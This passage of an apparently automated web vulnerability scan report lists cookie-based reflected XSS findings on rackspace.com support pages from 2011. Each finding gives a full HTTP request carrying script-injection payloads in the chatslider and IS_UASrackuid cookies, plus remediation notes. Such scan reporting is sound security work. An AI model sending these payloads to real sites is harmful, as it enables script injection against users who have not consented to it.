GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbc3ec"><script>alert(1)</script>ee0c24c0430; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e825"%3balert(1)//7bd105ef699 was submitted in the chatslider cookie. This input was echoed as 3e825";alert(1)//7bd105ef699 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3e825"%3balert(1)//7bd105ef699; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7faac"><script>alert(1)</script>b5a54f69619 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87faac"><script>alert(1)</script>b5a54f69619; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc52"%3balert(1)//17463e51f83 was submitted in the IS_UASrackuid cookie. This input was echoed as dcc52";alert(1)//17463e51f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dcc52"%3balert(1)//17463e51f83; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 36882
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac7d"%3balert(1)//fc8cdae7bd was submitted in the chatslider cookie. This input was echoed as 5ac7d";alert(1)//fc8cdae7bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D5ac7d"%3balert(1)//fc8cdae7bd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b828"><script>alert(1)</script>b93e4c4fdc9 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4b828"><script>alert(1)</script>b93e4c4fdc9; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0e37"%3balert(1)//49dff076351 was submitted in the IS_UASrackuid cookie. This input was echoed as a0e37";alert(1)//49dff076351 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a0e37"%3balert(1)//49dff076351; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39983
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec00e"><script>alert(1)</script>340977c3d24 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ec00e"><script>alert(1)</script>340977c3d24; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a9b7"><script>alert(1)</script>dbe12882938 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8a9b7"><script>alert(1)</script>dbe12882938; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5c3"%3balert(1)//d85aec81d9 was submitted in the chatslider cookie. This input was echoed as db5c3";alert(1)//d85aec81d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/servicelevels/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddb5c3"%3balert(1)//d85aec81d9; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92429"%3balert(1)//66d51c896f4 was submitted in the IS_UASrackuid cookie. This input was echoed as 92429";alert(1)//66d51c896f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
